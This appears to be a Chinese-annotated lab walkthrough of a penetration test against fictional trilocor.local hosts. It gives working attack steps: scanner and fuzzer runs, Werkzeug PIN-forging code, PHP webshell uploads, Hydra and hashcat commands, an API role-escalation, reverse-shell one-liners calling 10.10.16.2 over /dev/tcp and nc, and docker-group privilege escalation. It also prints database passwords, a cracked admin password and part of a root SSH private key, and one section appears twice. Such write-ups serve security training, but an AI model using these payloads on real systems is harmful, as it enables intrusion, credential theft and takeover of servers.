https://www.wordfence.com/threat-intel/vulnerabilities/id/f23604b7-5a7f-4be7-bc73-cb4facdd1e73 | | Version: 3.5.3 (100% confidence) | Found By: Query Parameter (Passive Detection) | - http://www.trilocor.local/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.5.3 | Confirmed By: | Javascript Comment (Aggressive Detection) | - http://www.trilocor.local/wp-content/plugins/elementor/assets/js/admin-feedback.js, Match: 'elementor - v3.5.3' | Style Comment (Aggressive Detection) | - http://www.trilocor.local/wp-content/plugins/elementor/assets/css/admin.min.css, Match: 'elementor - v3.5.3' [+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:43 <=====================> (652 / 652) 100.00% Time: 00:00:43 [+] Checking Theme Versions (via Passive and Aggressive Methods) [i] Theme(s) Identified: [+] astra | Location: http://www.trilocor.local/wp-content/themes/astra/ | Latest Version: 4.8.10 | Last Updated: 2025-01-07T00:00:00.000Z | Style URL: http://www.trilocor.local/wp-content/themes/astra/style.css | | Found By: Urls In Homepage (Passive Detection) | | [!] 2 vulnerabilities identified: | | [!] Title: Astra < 4.6.9 - Contributor+ Stored XSS | Fixed in: 4.6.9 | References: | - https://wpscan.com/vulnerability/62871f3a-c9a8-49bb-b67b-143af3caa986 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2347 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed914e67-4cf7-49b1-96be-ed8c604e6dce | | [!] Title: Astra < 4.6.5 - Editor+ Stored XSS via Theme Header/Footer | Fixed in: 4.6.5 | References: | - https://wpscan.com/vulnerability/30fd2612-91f6-4c1b-8d0c-fa607edf4717 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29768 | - https://patchstack.com/database/vulnerability/astra/wordpress-astra-theme-4-6-4-cross-site-scripting-xss-vulnerability | | The version could not be determined. [+] Enumerating Timthumbs (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:02:47 <===================> (2575 / 2575) 100.00% Time: 00:02:47 [i] No Timthumbs Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:09 <======================> (137 / 137) 100.00% Time: 00:00:09 [i] No Config Backups Found. [+] Enumerating DB Exports (via Passive and Aggressive Methods) Checking DB Exports - Time: 00:00:05 <============================> (84 / 84) 100.00% Time: 00:00:05 [i] No DB Exports Found. [+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected) Brute Forcing Attachment IDs - Time: 00:00:06 <=================> (100 / 100) 100.00% Time: 00:00:06 [i] Medias(s) Identified: [+] http://www.trilocor.local/?attachment_id=1 | Found By: Attachment Brute Forcing (Aggressive Detection) [+] http://www.trilocor.local/?attachment_id=2 | Found By: Attachment Brute Forcing (Aggressive Detection) <SNIP> [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:06 <=======================> (10 / 10) 100.00% Time: 00:00:06 [i] No Users Found. [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 3 | Requests Remaining: 22 [+] Finished: Thu Jan 16 05:41:01 2025 [+] Requests Done: 3620 [+] Cached Requests: 17 [+] Data Sent: 859.696 KB [+] Data Received: 3.706 MB [+] Memory used: 325.613 MB [+] Elapsed time: 00:04:22
Wordpress Plugin Elementor 3.5.5 - Iframe Injection CVE-2022-4953
1 http://trilocor.local/#elementor-action:action=lighthtbox&settings=eyJ0eXBlijoidmlkZW8iLCj1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZxJhbS5jb20vln0ka
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 $ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://www.trilocor.local:7777/FUZZ -fs 78 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://www.trilocor.local:7777/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 78 ________________________________________________ [Status: 200, Size: 18473, Words: 3759, Lines: 837, Duration: 269ms] console [Status: 200, Size: 1563, Words: 330, Lines: 46, Duration: 253ms] :: Progress: [4614/4614] :: Job [1/1] :: 72 req/sec :: Duration: [0:01:06] :: Errors: 0 ::
URL/console
利用 uat01-eu.intranet.trilocor.local Web 漏洞后拿到 WEB-NIX01 机器的 Shell,便可攻击此网站
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/werkzeug.html#werkzeug-console-pin-exploit
1 2 3 4 5 6 7 8 9 websvc@WEB-NIX01:/home/websvc$ ls -l /usr/local/lib/ | grep python ls -l /usr/local/lib/ | grep python drwxrwsr-x 3 root staff 4096 Apr 23 2020 python3.8 websvc@WEB-NIX01:/home/websvc$ python3 -c 'import uuid; print(str(uuid.getnode()))' python3 -c 'import uuid; print(str(uuid.getnode()))' 67717014043514 websvc@WEB-NIX01:/home/websvc$ cat /etc/machine-id cat /etc/machine-id 49967d13a6e2400c9aa2ce8a2a217dbe
pin-poc.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 import hashlibfrom itertools import chainprobably_public_bits = [ 'srvadm' , 'flask.app' , 'Flask' , '/usr/local/lib/python3.8/dist-packages/flask/app.py' ] private_bits = [ '67717014043514' , '49967d13a6e2400c9aa2ce8a2a217dbe' ] h = hashlib.sha1() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance (bit, str ): bit = bit.encode('utf-8' ) h.update(bit) h.update(b'cookiesalt' ) cookie_name = '__wzd' + h.hexdigest()[:20 ] num = None if num is None : h.update(b'pinsalt' ) num = ('%09d' % int (h.hexdigest(), 16 ))[:9 ] rv = None if rv is None : for group_size in 5 , 4 , 3 : if len (num) % group_size == 0 : rv = '-' .join(num[x:x + group_size].rjust(group_size, '0' ) for x in range (0 , len (num), group_size)) break else : rv = num print (rv)
1 2 $ python3.12 pin-poc.py 672-875-321
进入 Console 后,执行下方代码以拿到 Shell
1 __import__('os').popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.2 4444 >/tmp/f').read();
blog.trilocor.local (Joomla 4.1.5)
URL/administrator
MSF 工具利用
1 scanner/http/==joomla==_api_improper_access_checks
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [+] Users JSON saved to /home/kali/.msf4/loot/20250116051138_default_10.129.170.214_joomla.users_996104.bin [+] Joomla Users ============ ID Super Use Name Username Email Send Email Register D Last Visit Group Name r ate Date s -- --------- ---- -------- ----- ---------- ---------- ---------- ---------- 543 * Administra Administra admin@tril 1 2022-08-03 Super User tor tor ocor.local 09:28:49 s [+] Config JSON saved to /home/kali/.msf4/loot/20250116051139_default_10.129.170.214_joomla.config_788525.bin [+] Joomla Config ============= Setting Value ------- ----- db encryption 0 db host 172.18.0.11 db name joomla db password db prefix org1j_ db user joomla dbtype mysqli
careers.trilocor.local (login)
1 (faild) hydra careers.trilocor.local -l admin -P /usr/share/wordlists/seclists/Passwords/darkweb2017-top10000.txt http-post-form "/index.php:username=^USER^&password=^PASS^:F=Error"
portal.trilocor.local (login)
pr.trilocor.local
remote.trilocor.local
store.trilocor.local
dev.trilocor.local
1 2 3 $ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://dev.trilocor.local/FUZZ transfer [Status: 200, Size: 87, Words: 4, Lines: 2, Duration: 268ms]
1 http://dev.trilocor.local/transfer -> http://securetransfer-dev.trilocor.local (Add to /etc/hosts)
securetransfer-dev.trilocor.local
1 2 3 4 5 6 7 8 9 $ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://securetransfer-dev.trilocor.local/FUZZ -e .php -r -recursion -recursion-depth 2 conn.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 263ms] download.php [Status: 200, Size: 17, Words: 3, Lines: 1, Duration: 280ms] files.php [Status: 200, Size: 2967, Words: 810, Lines: 66, Duration: 274ms] index.php [Status: 200, Size: 2967, Words: 810, Lines: 66, Duration: 283ms] static [Status: 200, Size: 1328, Words: 88, Lines: 19, Duration: 313ms] storage [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 262ms] upload.php [Status: 200, Size: 2967, Words: 810, Lines: 66, Duration: 329ms]
文件上传 注册一个账户
上传文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 POST /upload.php HTTP/1.1 Host: securetransfer-dev.trilocor.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------278895466837969786693227377055 Content-Length: 256 Origin: http://securetransfer-dev.trilocor.local Connection: keep-alive Referer: http://securetransfer-dev.trilocor.local/files.php Cookie: PHPSESSID=efjlvn6ip46uataua8jn6nci3r -----------------------------278895466837969786693227377055 Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/x-php <?php system(REQUEST[1]);?> -----------------------------278895466837969786693227377055--
下载此文件会重定向到这个链接 http://securetransfer-dev.trilocor.local/download.php?file=6e0ec8be-c15e-4009-8871-358c4cc60d84
使用 sqlmap 工具测试 SQL Injection
1 2 $ curl http://securetransfer-dev.trilocor.local/storage/2_6e0ec8be-c15e-4009-8871-358c4cc60d84.php\?1=hostname c8601dccf970
c8601dccf970 (172.17.0.2) Reverse Shell 1 curl http://securetransfer-dev.trilocor.local/storage/2_617c265c-fee3-4268-b58e-95724c23892d.php\?1=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.2%2F4444%200%3E%261%27
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 $ nc -lvnp 4444 listening on [any] 4444 ... connect to [10.10.16.2] from (UNKNOWN) [10.129.170.214] 33922 www-data@c8601dccf970:/var/www/html/storage$ hostname hostname c8601dccf970 www-data@c8601dccf970:/var/www/html/storage$ ifconfig ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255 ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet) RX packets 578418 bytes 143515071 (143.5 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 308284 bytes 169275041 (169.2 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 997893 bytes 87645713 (87.6 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 997893 bytes 87645713 (87.6 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 www-data@c8601dccf970:/var/www/html/storage$ cat /home/flag.txt cat /home/flag.txt 4ef576b079b28810f1abd99783ca1eab
MySQL 在 /var/www/html/conn.php 文件中找到数据库凭证
1 2 3 4 5 6 7 8 9 # conn.php <?php define('DB_SERVER', '127.0.0.1'); define('DB_USERNAME', 'securetransfer-db-admin'); define('DB_PASSWORD', '7dWo3i26ODc84kcA'); define('DB_NAME', 'securetransfer'); $conn = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
使用凭证链接数据库 (没有有价值的信息)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 www-data@c8601dccf970:/var/www/html/storage$ mysql -h 127.0.0.1 -u securetransfer-db-admin -p7dWo3i26ODc84kcA mysql: [Warning] Using a password on the command line interface can be insecure. Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 52262 Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu) Copyright (c) 2000, 2022, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | performance_schema | | securetransfer | +--------------------+ 3 rows in set (0.02 sec) mysql> use securetransfer; use securetransfer; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +--------------------------+ | Tables_in_securetransfer | +--------------------------+ | files | | users | +--------------------------+ 2 rows in set (0.00 sec) mysql> select * from users; select * from users; +-----+------------+----------------------------------+----------------------+ | uid | user_login | user_pass | user_email | +-----+------------+----------------------------------+----------------------+ | 1 | | d41d8cd98f00b204e9800998ecf8427e | | | 2 | n2ryx | 778b5bd4e356324db680c950b071833d | n2ryx@trilocor.local | +-----+------------+----------------------------------+----------------------+ 2 rows in set (0.00 sec) mysql> select * from files select * from files; +-----+--------------------------------------+-----------+------------------------------------------------------------------+---------------------+--------+ | uid | uuid | file_name | real_path | upload_date | public | +-----+--------------------------------------+-----------+------------------------------------------------------------------+---------------------+--------+ | 2 | 0900d99e-c949-4e89-8904-506626afb98a | 1.txt | /var/www/html/storage/2_0900d99e-c949-4e89-8904-506626afb98a.txt | 2025-01-17 05:50:32 | 0 | | 2 | 3773a32a-99a2-4bef-a5f8-557a3c5a5b3e | shell.php | /var/www/html/storage/2_3773a32a-99a2-4bef-a5f8-557a3c5a5b3e.php | 2025-01-17 05:05:47 | 0 | | 2 | 617c265c-fee3-4268-b58e-95724c23892d | 1.php | /var/www/html/storage/2_617c265c-fee3-4268-b58e-95724c23892d.php | 2025-01-17 05:29:07 | 0 | | 2 | 88cb27ea-d1a7-4587-b6c7-919158fc8061 | shell.php | /var/www/html/storage/2_88cb27ea-d1a7-4587-b6c7-919158fc8061.php | 2025-01-17 06:54:11 | 0 | +-----+--------------------------------------+-----------+------------------------------------------------------------------+---------------------+--------+ 4 rows in set (0.00 sec) mysql> quit
osticket Administrator password 发现 /apps/osticket_data.zip 文件,复制到 web 目录下,然后通过浏览器下载
1 2 3 4 5 6 7 8 www-data@c8601dccf970:/var/www/html/storage$ ls -al /apps ls -al /apps total 40 drwxr-xr-x 1 root root 4096 Aug 22 2022 . drwxr-xr-x 1 root root 4096 Sep 14 2022 .. -rw-r--r-- 1 root root 31062 Jul 21 2022 osticket_data.zip www-data@c8601dccf970:/var/www/html/storage$ cp /apps/osticket_data.zip .
1 $ wget http://securetransfer-dev.trilocor.local/storage/osticket_data.zip
解压文件,导入 config.sql, 在其 osticket.ost_staff 表中找到管理员密码
1 2 Administrator $2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88.
使用 hashcat 工具破解
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 $ hashcat -m 3200 osticket.hash /usr/share/wordlists/rockyou.txt <SNIP> Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 1 sec $2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2QiQKyH88.:administracion Session..........: hashcat Status...........: Cracked Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix)) Hash.Target......: $2a$08$UPdUiJSf37r.gC7TUnOLQOY4HTTLms7G.dUAPDTXKpI2...KyH88. Time.Started.....: Sat Jan 18 03:56:35 2025 (1 min, 52 secs) Time.Estimated...: Sat Jan 18 03:58:27 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 143 H/s (6.87ms) @ Accel:2 Loops:64 Thr:1 Vec:1 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 15916/14344385 (0.11%) Rejected.........: 0/15916 (0.00%) Restore.Point....: 15912/14344385 (0.11%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:192-256 Candidate.Engine.: Device Generator Candidates.#1....: ananas -> adambrody Hardware.Mon.#1..: Util: 98% Started: Sat Jan 18 03:56:31 2025 Stopped: Sat Jan 18 03:58:28 2025
osticketapp.trilocor.local
使用凭证登录 osticketapp.trilocor.local 后台
1 2 http://osticketapp.trilocor.local/scp/login.php Administrator:administracion
找到一个 subdomain
1 gogsusdev01.trilocor.local
gogsusdev01.trilocor.local 在 http://gogsusdev01.trilocor.local/explore/repos 又发现一个子域名
还有一些 markdown 文档
uat01-eu.intranet.trilocor.local 查阅文档以继续渗透
API Abuse Register
1 2 3 4 5 6 7 8 9 POST /auth/login HTTP/1.1 Host: uat01-eu.intranet.trilocor.local Content-Type: application/json Content-Length: 78 { "username": "n2ryx", "password":"uat01-eu.intranet.trilocor.local" }
Login, Copy PHPSEESSID
1 2 3 4 5 6 7 8 9 10 POST /auth/login HTTP/1.1 Host: uat01-eu.intranet.trilocor.local Content-Type: application/json Content-Length: 78 { "username": "n2ryx", "password":"uat01-eu.intranet.trilocor.local" }
Update, admin role
1 2 3 4 5 6 7 8 9 POST /auth/update HTTP/1.1 Host: uat01-eu.intranet.trilocor.local Cookie: PHPSESSID=329ct0vu5nooi97qb4pcfuljb1 Content-Type: application/json Content-Length: 27 { "role": "admin" }
Login, Copy PHPSESSID again
1 2 3 4 5 6 7 8 9 POST /auth/login HTTP/1.1 Host: uat01-eu.intranet.trilocor.local Content-Type: application/json Content-Length: 78 { "username": "n2ryx", "password":"uat01-eu.intranet.trilocor.local" }
Add Support Ticket
1 2 3 4 5 6 7 8 9 10 POST /support/add HTTP/1.1 Host: uat01-eu.intranet.trilocor.local Cookie: PHPSESSID=59kg248kfdgb6b1pi6nd21rb8d Content-Type: application/json Content-Length: 51 { "ticket": "<?php system($_REQUEST[1]);?>" }
List Tickets
1 2 3 4 5 6 GET /support/list HTTP/1.1 Host: uat01-eu.intranet.trilocor.local User-Agent: curl/8.11.1 Accept: */* Cookie: PHPSESSID=59kg248kfdgb6b1pi6nd21rb8d Connection: keep-alive
Export Ticket to .json.php file
1 2 3 4 5 6 7 POST /support/export/1 HTTP/1.1 Host: uat01-eu.intranet.trilocor.local Cookie: PHPSESSID=59kg248kfdgb6b1pi6nd21rb8d Content-Type: application/json Content-Length: 21 {"type":"json.php"}
Webshell
1 2 3 GET /exports/tickets_1_20250118145741_29ab7e67_682a_4930_9aaf_62370296ba50.json.php?1=hostname HTTP/1.1 Host: uat01-eu.intranet.trilocor.local Cookie: PHPSESSID=k0256olikv98nqjdnishpk5ia0
Internal Testing Initial Access WEB- NIX01 (websvc) 1 $ curl "http://uat01-eu.intranet.trilocor.local/exports/tickets_1_20250118145741_29ab7e67_682a_4930_9aaf_62370296ba50.json.php?1=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.2/4444+0>%261'
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ nc -lvnp 4444 listening on [any] 4444 ... connect to [10.10.16.2] from (UNKNOWN) [10.129.171.25] 59070 bash: cannot set terminal process group (1501): Inappropriate ioctl for device bash: no job control in this shell websvc@WEB-NIX01:/var/www/html/_intranet/exports$ python3 -c 'import pty; pty.spawn("/bin/sh")' python3 -c 'import pty; pty.spawn("/bin/sh")' $ export TERM=xterm export TERM=xterm $ hostname -I hostname -I 10.129.171.25 172.16.139.10 172.17.0.1 172.18.0.1 dead:beef::250:56ff:fe94:e4da $ cat /home/websvc/flag.txt cat /home/websvc/flag.txt 59b18b704c1f0428357d89259045a829
WEB- NIX01 (srvadm)
利用 uat01-eu.intranet.trilocor.local Web 漏洞后拿到 WEB-NIX01 机器的 Shell,便可攻击此网站
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/werkzeug.html#werkzeug-console-pin-exploit
1 2 3 4 5 6 7 8 9 websvc@WEB-NIX01:/home/websvc$ ls -l /usr/local/lib/ | grep python ls -l /usr/local/lib/ | grep python drwxrwsr-x 3 root staff 4096 Apr 23 2020 python3.8 websvc@WEB-NIX01:/home/websvc$ python3 -c 'import uuid; print(str(uuid.getnode()))' python3 -c 'import uuid; print(str(uuid.getnode()))' 67717014043514 websvc@WEB-NIX01:/home/websvc$ cat /etc/machine-id cat /etc/machine-id 49967d13a6e2400c9aa2ce8a2a217dbe
pin-poc.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 import hashlibfrom itertools import chainprobably_public_bits = [ 'srvadm' , 'flask.app' , 'Flask' , '/usr/local/lib/python3.8/dist-packages/flask/app.py' ] private_bits = [ '67717014043514' , '49967d13a6e2400c9aa2ce8a2a217dbe' ] h = hashlib.sha1() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance (bit, str ): bit = bit.encode('utf-8' ) h.update(bit) h.update(b'cookiesalt' ) cookie_name = '__wzd' + h.hexdigest()[:20 ] num = None if num is None : h.update(b'pinsalt' ) num = ('%09d' % int (h.hexdigest(), 16 ))[:9 ] rv = None if rv is None : for group_size in 5 , 4 , 3 : if len (num) % group_size == 0 : rv = '-' .join(num[x:x + group_size].rjust(group_size, '0' ) for x in range (0 , len (num), group_size)) break else : rv = num print (rv)
1 2 $ python3.12 pin-poc.py 672-875-321
进入 Console 后,执行下方代码以拿到 Shell
1 __import__('os').popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.2 4444 >/tmp/f').read();
Privilege Escalation 使用 srvadm 用户的 docker 组权限挂载 /root 目录到容器以读取其密钥文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 srvadm@WEB-NIX01:~$ id id uid=1002(srvadm) gid=1002(srvadm) groups=1002(srvadm),119(docker) srvadm@WEB-NIX01:~$ docker images docker images REPOSITORY TAG IMAGE ID CREATED SIZE securetransferprod latest 6f52bdbbf650 2 years ago 1.06GB tmp_securetransfer latest ba39a533c032 2 years ago 855MB tmp_vpn latest 14fa9ab62e10 2 years ago 246MB tmp_dev latest f70cf97cfe0c 2 years ago 223MB tmp_osticket latest 1d44a3603b8a 2 years ago 1.5GB tmp_shop latest b4fee9523990 2 years ago 458MB tmp_hr latest 006074398af3 2 years ago 242MB tmp_jobs latest 68a67e7c1252 2 years ago 40.5MB tmp_pr latest c8f1d6fa82f6 2 years ago 275MB mariadb latest 40b966d7252f 2 years ago 383MB gogs/gogs latest 2d3ecd7629e1 2 years ago 94.8MB ubuntu 20.04 3bc6e9f30f51 2 years ago 72.8MB alpine 3.13 38cacb9bafd2 2 years ago 5.61MB joomla latest 1d5bf464d602 2 years ago 625MB srvadm@WEB-NIX01:~$ docker run -v /root:/mnt -it ubuntu:20.04 docker run -v /root:/mnt -it ubuntu:20.04 root@d83a15237dbf:/# ls -al /mnt ls -al /mnt total 64 drwx------ 7 root root 4096 Jan 20 11:31 . drwxr-xr-x 1 root root 4096 Jan 20 11:52 .. lrwxrwxrwx 1 root root 9 Aug 3 2022 .bash_history -> /dev/null -rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc drwx------ 3 root root 4096 Aug 3 2022 .cache drwx------ 3 root root 4096 Aug 18 2022 .config drwxr-xr-x 3 root root 4096 Aug 3 2022 .local -rw-r--r-- 1 root root 161 Dec 5 2019 .profile -rw------- 1 root root 39 Aug 8 2022 .python_history drwx------ 2 root root 4096 Aug 3 2022 .ssh -rw------- 1 root root 15201 Sep 14 2022 .viminfo -rw-r--r-- 1 root root 215 Aug 3 2022 .wget-hsts -rw-r--r-- 1 root root 33 Jan 20 11:31 flag.txt drwxr-xr-x 3 root root 4096 Oct 6 2021 snap root@d83a15237dbf:/# cat /mnt/flag.txt cat /mnt/flag.txt 0c26cae4e085afd8f3e3d2eaa3b67715
读取 root 用户的 id_rsa 密钥文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 root@d83a15237dbf:/# ls -al /mnt/.ssh ls -al /mnt/.ssh total 20 drwx------ 2 root root 4096 Aug 3 2022 . drwx------ 7 root root 4096 Jan 20 11:31 .. -rw------- 1 root root 568 Aug 3 2022 authorized_keys -rw------- 1 root root 2602 Aug 3 2022 id_rsa -rw-r--r-- 1 root root 568 Aug 3 2022 id_rsa.pub root@d83a15237dbf:/# cat /mnt/.ssh/id_rsa cat /mnt/.ssh/id_rsa -----BEGIN OPENSSH PRIVATE KEY----- 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 